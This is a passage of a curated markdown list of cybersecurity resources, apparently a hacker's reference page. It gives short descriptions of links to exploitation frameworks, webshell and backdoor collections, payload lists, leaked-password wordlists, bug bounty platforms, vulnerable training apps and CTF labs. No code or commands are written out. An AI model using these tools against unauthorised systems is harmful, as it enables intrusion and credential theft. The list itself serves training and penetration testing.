by Google.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/AFLplusplus/AFLplusplus"><b>AFL++</b></a> - is AFL with community patches.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/syzkaller"><b>syzkaller</b></a> - is an unsupervised, coverage-guided kernel fuzzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/pwndbg/pwndbg"><b>pwndbg</b></a> - exploit development and reverse engineering with GDB made easy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/longld/peda"><b>GDB PEDA</b></a> - Python Exploit Development Assistance for GDB.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hex-rays.com/products/ida/index.shtml"><b>IDA</b></a> - multi-processor disassembler and debugger useful for reverse engineering malware.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/radare/radare2"><b>radare2</b></a> - framework for reverse-engineering and analyzing binaries.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/threat9/routersploit"><b>routersploit</b></a> - exploitation framework for embedded devices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/NationalSecurityAgency/ghidra"><b>Ghidra</b></a> - is a software reverse engineering (SRE) framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/salesforce/vulnreport"><b>Vulnreport</b></a> - open-source pentesting management and automation platform by Salesforce Product Security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sc0tfree/mentalist"><b>Mentalist</b></a> - is a graphical tool for custom wordlist generation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/archerysec/archerysec"><b>archerysec</b></a> - vulnerability assessment and management helps to perform scans and manage vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/j3ssie/Osmedeus"><b>Osmedeus</b></a> - fully automated offensive security tool for reconnaissance and vulnerability scanning.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/beefproject/beef"><b>beef</b></a> - the browser exploitation framework project.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/NullArray/AutoSploit"><b>AutoSploit</b></a> - automated mass exploiter.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/TH3xACE/SUDO_KILLER"><b>SUDO_KILLER</b></a> - is a tool to identify and exploit sudo rules' misconfigurations and vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/VirusTotal/yara"><b>yara</b></a> - the pattern matching swiss knife.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gentilkiwi/mimikatz"><b>mimikatz</b></a> - a little tool to play with Windows security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sherlock-project/sherlock"><b>sherlock</b></a> - hunt down social media accounts by username across social networks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://owasp.org/www-project-threat-dragon/"><b>OWASP Threat Dragon</b></a> - is a tool used to create threat model diagrams and to record possible threats.<br> </p> ##### :black_small_square: Pentests bookmarks collection <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.pentest-standard.org/index.php/Main_Page"><b>PTES</b></a> - the penetration testing execution standard.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.amanhardikar.com/mindmaps/Practice.html"><b>Pentests MindMap</b></a> - amazing mind map with vulnerable apps and systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.amanhardikar.com/mindmaps/webapptest.html"><b>WebApps Security Tests MindMap</b></a> - incredible mind map for WebApps security tests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://brutelogic.com.br/blog/"><b>Brute XSS</b></a> - master the art of Cross Site Scripting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet"><b>XSS cheat sheet</b></a> - contains many vectors that can help you bypass WAFs and filters.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jivoi.github.io/2015/07/03/offensive-security-bookmarks/"><b>Offensive Security Bookmarks</b></a> - security bookmarks collection, all things that author need to pass OSCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/coreb1t/awesome-pentest-cheat-sheets"><b>Awesome Pentest Cheat Sheets</b></a> - collection of the cheat sheets useful for pentesting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Hack-with-Github/Awesome-Hacking"><b>Awesome Hacking by HackWithGithub</b></a> - awesome lists for hackers, pentesters and security researchers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/carpedm20/awesome-hacking"><b>Awesome Hacking by carpedm20</b></a> - a curated list of awesome hacking tutorials, tools and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vitalysim/Awesome-Hacking-Resources"><b>Awesome Hacking Resources</b></a> - collection of hacking/penetration testing resources to make you better.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/enaqx/awesome-pentest"><b>Awesome Pentest</b></a> - collection of awesome penetration testing resources, tools and other shiny things.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/m4ll0k/Awesome-Hacking-Tools"><b>Awesome-Hacking-Tools</b></a> - is a curated list of awesome Hacking Tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ksanchezcld/Hacking_Cheat_Sheet"><b>Hacking Cheat Sheet</b></a> - author hacking and pentesting notes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/toolswatch/blackhat-arsenal-tools"><b>blackhat-arsenal-tools</b></a> - official Black Hat arsenal security tools repository.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.peerlyst.com/posts/the-complete-list-of-infosec-related-cheat-sheets-claus-cramon"><b>Penetration Testing and WebApp Cheat Sheets</b></a> - the complete list of Infosec related cheat sheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/The-Art-of-Hacking/h4cker"><b>Cyber Security Resources</b></a> - includes thousands of cybersecurity-related references and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jhaddix/pentest-bookmarks"><b>Pentest Bookmarks</b></a> - there are a LOT of pentesting blogs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OlivierLaflamme/Cheatsheet-God"><b>Cheatsheet-God</b></a> - Penetration Testing Reference Bank - OSCP/PTP & PTX Cheatsheet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Cyb3rWard0g/ThreatHunter-Playbook"><b>ThreatHunter-Playbook</b></a> - to aid the development of techniques and hypothesis for hunting campaigns.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hmaverickadams/Beginner-Network-Pentesting"><b>Beginner-Network-Pentesting</b></a> - notes for beginner network pentesting course.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a> - is a list of resources that author have been gathering in preparation for the OSCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/swisskyrepo/PayloadsAllTheThings"><b>PayloadsAllTheThings</b></a> - a list of useful payloads and bypass for Web Application Security and Pentest/CTF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/foospidy/payloads"><b>payloads</b></a> - git all the Payloads! A collection of web attack payloads.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/payloadbox/command-injection-payload-list"><b>command-injection-payload-list</b></a> - command injection payload list.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/s0md3v/AwesomeXSS"><b>AwesomeXSS</b></a> - is a collection of Awesome XSS resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/JohnTroony/php-webshells"><b>php-webshells</b></a> - common php webshells.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/"><b>Pentesting Tools Cheat Sheet</b></a> - a quick reference high level overview for typical penetration testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cheatsheetseries.owasp.org/"><b>OWASP Cheat Sheet Series</b></a> - is a collection of high value information on specific application security topics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jeremylong.github.io/DependencyCheck/index.html"><b>OWASP dependency-check</b></a> - is an open source solution the OWASP Top 10 2013 entry.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Proactive_Controls"><b>OWASP ProActive Controls</b></a> - OWASP Top 10 Proactive Controls 2018.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE"><b>PENTESTING-BIBLE</b></a> - hacking & penetration testing & red team & cyber security & computer science resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/nixawk/pentest-wiki"><b>pentest-wiki</b></a> - is a free online security knowledge library for pentesters/researchers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://media.defcon.org/"><b>DEF CON Media Server</b></a> - great stuff from DEFCON.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rshipp/awesome-malware-analysis"><b>Awesome Malware Analysis</b></a> - a curated list of awesome malware analysis tools and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/"><b>SQL Injection Cheat Sheet</b></a> - detailed technical information about the many different variants of the SQL Injection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://kb.entersoft.co.in/"><b>Entersoft Knowledge Base</b></a> - great and detailed reference about vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://html5sec.org/"><b>HTML5 Security Cheatsheet</b></a> - a collection of HTML5 related XSS attack vectors.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://evuln.com/tools/xss-encoder/"><b>XSS String Encoder</b></a> - for generating XSS code to check your input validation filters against XSS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gtfobins.github.io/"><b>GTFOBins</b></a> - list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://guif.re/"><b>Guifre Ruiz Notes</b></a> - collection of security, system, network and pentest cheatsheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://blog.safebuff.com/2016/07/03/SSRF-Tips/index.html"><b>SSRF Tips</b></a> - a collection of SSRF Tips.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://shell-storm.org/repo/CTF/"><b>shell-storm repo CTF</b></a> - great archive of CTFs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bl4de/ctf"><b>ctf</b></a> - CTF (Capture The Flag) writeups, code snippets, notes, scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/orangetw/My-CTF-Web-Challenges"><b>My-CTF-Web-Challenges</b></a> - collection of CTF Web challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/owasp-mstg"><b>MSTG</b></a> - The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sdcampbell/Internal-Pentest-Playbook"><b>Internal-Pentest-Playbook</b></a> - notes on the most common things for an Internal Network Penetration Test.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/streaak/keyhacks"><b>KeyHacks</b></a> - shows quick ways in which API keys leaked by a bug bounty program can be checked.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/securitum/research"><b>securitum/research</b></a> - various Proof of Concepts of security research performed by Securitum.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/juliocesarfort/public-pentesting-reports"><b>public-pentesting-reports</b></a> - is a list of public pentest reports released by several consulting security groups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/djadmin/awesome-bug-bounty"><b>awesome-bug-bounty</b></a> - is a comprehensive curated list of available Bug Bounty.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ngalongc/bug-bounty-reference"><b>bug-bounty-reference</b></a> - is a list of bug bounty write-ups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/devanshbatham/Awesome-Bugbounty-Writeups"><b>Awesome-Bugbounty-Writeups</b></a> - is a curated list of bugbounty writeups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pentester.land/list-of-bug-bounty-writeups.html"><b>Bug bounty writeups</b></a> - list of bug bounty writeups (2012-2020).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hackso.me/"><b>hackso.me</b></a> - a great journey into security.<br> </p> ##### :black_small_square: Backdoors/exploits <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bartblaze/PHP-backdoors"><b>PHP-backdoors</b></a> - a collection of PHP backdoors. For educational or testing purposes only.<br> </p> ##### :black_small_square: Wordlists and Weak passwords <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://weakpass.com/"><b>Weakpass</b></a> - for any kind of bruteforce find wordlists or unleash the power of them all at once!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hashes.org/"><b>Hashes.org</b></a> - is a free online hash resolving service incorporating many unparalleled techniques.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danielmiessler/SecLists"><b>SecLists</b></a> - collection of multiple types of lists used during security assessments, collected in one place.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/berzerk0/Probable-Wordlists"><b>Probable-Wordlists</b></a> - sorted by probability originally created for password generation and testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.skullsecurity.org/index.php?title=Passwords"><b>skullsecurity passwords</b></a> - password dictionaries and leaked passwords repository.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bezpieka.org/polski-slownik-premium-polish-wordlist"><b>Polish PREMIUM Dictionary</b></a> - official dictionary created by the team on the forum bezpieka.org.<b>*</b> <sup><a href="https://sourceforge.net/projects/kali-linux/files/Wordlist/">1</sup><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/insidetrust/statistically-likely-usernames"><b>statistically-likely-usernames</b></a> - wordlists for creating statistically likely username lists.<br> </p> ##### :black_small_square: Bounty platforms <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.yeswehack.com/"><b>YesWeHack</b></a> - bug bounty platform with infosec jobs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openbugbounty.org/"><b>Openbugbounty</b></a> - allows any security researcher reporting a vulnerability on any website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackerone.com/"><b>hackerone</b></a> - global hacker community to surface the most relevant security issues.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.bugcrowd.com/"><b>bugcrowd</b></a> - crowdsourced cybersecurity for the enterprise.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://crowdshield.com/"><b>Crowdshield</b></a> - crowdsourced security & bug bounty management.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.synack.com/"><b>Synack</b></a> - crowdsourced security & bug bounty programs, crowd security intelligence platform, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hacktrophy.com/en/"><b>Hacktrophy</b></a> - bug bounty platform.<br> </p> ##### :black_small_square: Web Training Apps (local installation) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project"><b>OWASP-VWAD</b></a> - comprehensive and well maintained registry of all known vulnerable web applications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.dvwa.co.uk/"><b>DVWA</b></a> - PHP/MySQL web application that is damn vulnerable.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://metasploit.help.rapid7.com/docs/metasploitable-2"><b>metasploitable2</b></a> - vulnerable web application amongst security researchers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rapid7/metasploitable3"><b>metasploitable3</b></a> - is a VM that is built from the ground up with a large amount of security vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/stamparm/DSVW"><b>DSVW</b></a> - is a deliberately vulnerable web application written in under 100 lines of code.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sourceforge.net/projects/mutillidae/"><b>OWASP Mutillidae II</b></a> - free, open source, deliberately vulnerable web-application.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project"><b>OWASP Juice Shop Project</b></a> - the most bug-free vulnerable application in existence.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project"><b>OWASP Node js Goat Project</b></a> - OWASP Top 10 security risks apply to web apps developed using Node.js.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/iteratec/juicy-ctf"><b>juicy-ctf</b></a> - run Capture the Flags and Security Trainings with OWASP Juice Shop.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/SecurityShepherd"><b>SecurityShepherd</b></a> - web and mobile application security training platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/opendns/Security_Ninjas_AppSec_Training"><b>Security Ninjas</b></a> - open source application security training program.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rapid7/hackazon"><b>hackazon</b></a> - a modern vulnerable web app.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/appsecco/dvna"><b>dvna</b></a> - damn vulnerable NodeJS application.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/DefectDojo/django-DefectDojo"><b>django-DefectDojo</b></a> - is an open-source application vulnerability correlation and security orchestration tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://google-gruyere.appspot.com/"><b>Google Gruyere</b></a> - web application exploits and defenses.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/amolnaik4/bodhi"><b>Bodhi</b></a> - is a playground focused on learning the exploitation of client-side web vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://websploit.h4cker.org/"><b>Websploit</b></a> - single vm lab with the purpose of combining several vulnerable appliations in one environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vulhub/vulhub"><b>vulhub</b></a> - pre-built Vulnerable Environments based on docker-compose.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://rhinosecuritylabs.com/aws/introducing-cloudgoat-2/"><b>CloudGoat 2</b></a> - the new & improved "Vulnerable by Design" AWS deployment tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/globocom/secDevLabs"><b>secDevLabs</b></a> - is a laboratory for learning secure web development in a practical manner.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/incredibleindishell/CORS-vulnerable-Lab"><b>CORS-vulnerable-Lab</b></a> - sample vulnerable code and its exploit code.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/moloch--/RootTheBox"><b>RootTheBox</b></a> - a Game of Hackers (CTF Scoreboard & Game Manager).<br> </p> ##### :black_small_square: Labs (ethical hacking platforms/trainings/CTFs) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.offensive-security.com/"><b>Offensive Security</b></a> - true performance-based penetration testing training for over a decade.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackthebox.eu/"><b>Hack The Box</b></a> - online platform allowing you to test your penetration testing skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hacking-lab.com/index.html"><b>Hacking-Lab</b></a> - online ethical hacking, computer network and security challenge platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://pwnable.kr/index.php"><b>pwnable.kr</b></a> - non-commercial wargame site which provides various pwn challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pwnable.tw/"><b>Pwnable.tw</b></a> - is a wargame site for hackers to test and expand their binary exploiting skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://picoctf.com/"><b>picoCTF</b></a> - is a free computer security game targeted at middle and high school students.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ctflearn.com/"><b>CTFlearn</b></a> - is an online platform built to help ethical hackers learn and practice their cybersecurity knowledge.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ctftime.org/"><b>ctftime</b></a> - CTF archive and a place, where you can get some another CTF-related info.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://silesiasecuritylab.com/"><b>Silesia Security Lab</b></a> - high quality security testing services.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://practicalpentestlabs.com/"><b>Practical Pentest Labs</b></a> - pentest lab, take your Hacking skills to the next level.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.root-me.org/?lang=en"><b>Root Me</b></a> - the fast, easy, and affordable way to train your hacking skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://rozwal.to/login"><b>rozwal.to</b></a> - a great platform to train your pentesting skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tryhackme.com/"><b>TryHackMe</b></a> - learning Cyber Security made easy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hackxor.net/"><b>hackxor</b></a> - is a realistic web application hacking game, designed to help players of all abilities develop their skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://hack-yourself-first.com/"><b>Hack Yourself First</b></a> - it's full of nasty app sec holes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://overthewire.org/wargames/"><b>OverTheWire</b></a> - can help you to learn and practice security concepts in the form of fun-filled games.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.wizard-security.net/"><b>Wizard Labs</b></a> - is an online Penetration Testing Lab.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pentesterlab.com/"><b>PentesterLab</b></a> - provides vulnerable systems that can be used to test and understand vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ringzer0ctf.com/"><b>RingZer0</b></a> - tons of challenges designed to test and improve your hacking skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.try2hack.nl/"><b>try2hack</b></a> - several security-oriented challenges for your entertainment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ubeeri.com/preconfig-labs"><b>Ubeeri</b></a> - preconfigured lab environments.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lab.pentestit.ru/"><b>Pentestit</b></a> - emulate IT infrastructures of real companies for legal pen testing and improving pentest skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://microcorruption.com/login"><b>Microcorruption</b></a> - reversal challenges done in the web interface.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://crackmes.one/"><b>Crackmes</b></a> - download crackmes to help improve your reverse engineering skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://domgo.at/cxss/intro"><b>DomGoat</b></a> - DOM XSS security learning and practicing platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://chall.stypr.com"><b>Stereotyped Challenges</b></a> - upgrade your web hacking techniques today!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vulnhub.com/"><b>Vulnhub</b></a> - allows anyone to gain practical 'hands-on' experience in digital security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://w3challs.com/"><b>W3Challs</b></a> - is a penetration testing training platform, which offers various computer challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ringzer0ctf.com/challenges"><b>RingZer0 CTF</b></a> - offers you tons of challenges designed to test and improve your hacking skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hack.me/"><b>Hack.me</b></a> - a platform where you can build, host and share vulnerable web apps for educational purposes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackthis.co.uk/levels/"><b>HackThis!</b></a> - discover how hacks, dumps and defacements are performed and secure your website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.enigmagroup.org/#"><b>Enigma Group WebApp Training</b></a> - these challenges cover the exploits listed in the OWASP Top 10 Project.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://challenges.re/"><b>Reverse Engineering Challenges</b></a> - challenges, exercises, problems and tasks - by level, by type, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://0x00sec.org/"><b>0x00sec</b></a> - the home of the Hacker - Malware, Reverse Engineering, and Computer Science.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.wechall.net/challs"><b>We Chall</b></a> - there are exist a lots of different challenge types.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackergateway.com/"><b>Hacker Gateway</b></a> - is the go-to place for hackers who want to test their skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hacker101.com/"><b>Hacker101</b></a> - is a free class for web security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://contained.af/"><b>contained.af</b></a> - a stupid game for learning about containers, capabilities, and syscalls.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://flaws.cloud/"><b>flAWS challenge!</b></a> - a series of levels you'll learn about common mistakes and gotchas when using AWS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cybersecurity.wtf"><b>CyberSec WTF</b></a> - provides web hacking challenges derived from bounty write-ups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ctfchallenge.co.uk/login"><b>CTF Challenge</b></a> - CTF Web App challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://capturetheflag.withgoogle.com"><b>gCTF</b></a> - most of the challenges used in the Google CTF 2017.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackthissite.org/pages/index/index.php"><b>Hack This Site</b></a> - is a free, safe and legal training ground for hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://attackdefense.com"><b>Attack & Defense</b></a> - is a browser-based cloud labs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptohack.org/"><b>Cryptohack</b></a> - a fun platform for learning modern cryptography.<br> </p> ##### :black_small_square: CTF platforms <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/facebook/fbctf"><b>fbctf</b></a> - platform to host Capture the Flag competitions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/ctfscoreboard"><b>ctfscoreboard</b></a> - scoreboard for Capture The Flag competitions.<br> </p> ##### :black_small_square: Other resources <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bugcrowd/bugcrowd_university"><b>Bugcrowd University</b></a> - open source education content for the researcher community.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a> - a list of resources and scripts that I have been gathering in preparation for the OSCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://medium.com/@cxosmo/owasp-top-10-real-world-examples-part-1-a540c4ea2df5"><b>OWASP Top 10: Real-World Examples</b></a> - test your web apps with real-world examples (two-part series).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://phrack.org/index.html"><b>phrack.org</b></a> - an awesome collection of articles from several respected hackers and other thinkers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Gr1mmie/Practical-Ethical-Hacking-Resources"><b>Practical-Ethical-Hacking-Resources</b></a> - compilation of resources from TCM's Udemy Course.<br> </p> #### Your daily knowledge and news &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: RSS Readers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://feedly.com/"><b>Feedly</b></a> - organize, read and share what matters to you.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.inoreader.com/"><b>Inoreader</b></a> - similar to feedly with a support for filtering what you fetch from rss.<br> </p> ##### :black_small_square: IRC Channels <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.hackerspaces.org/IRC_Channel"><b>#hackerspaces</b></a> - hackerspace IRC channels.<br> </p> ##### :black_small_square: Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://thehackernews.com/"><b>The Hacker News</b></a> - leading news source dedicated to promoting awareness for security experts and hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://latesthackingnews.com/"><b>Latest Hacking News</b></a> - provides the latest hacking news, exploits and vulnerabilities for ethical hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securitynewsletter.co/"><b>Security Newsletter</b></a> - security news as a weekly digest (email notifications).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://security.googleblog.com/"><b>Google Online Security Blog</b></a> - the latest news and insights from Google on security and safety on the Internet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.qualys.com/"><b>Qualys Blog</b></a> - expert network security guidance and news.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.darkreading.com/"><b>DARKReading</b></a> - connecting the Information Security Community.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.darknet.org.uk/"><b>Darknet</b></a> - latest hacking tools, hacker news, cybersecurity best practices, ethical hacking & pen-testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/disclosedh1"><b>publiclyDisclosed</b></a> - public disclosure watcher who keeps you up to date about the recently disclosed bugs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.reddit.com/r/hacking/"><b>Reddit - Hacking</b></a> - a subreddit dedicated to hacking and hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://packetstormsecurity.com/"><b>Packet Storm</b></a> - information security services, news, files, tools, exploits, advisories and whitepapers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sekurak.pl/"><b>Sekurak</b></a> - about security, penetration tests, vulnerabilities and many others (PL/EN).<br> 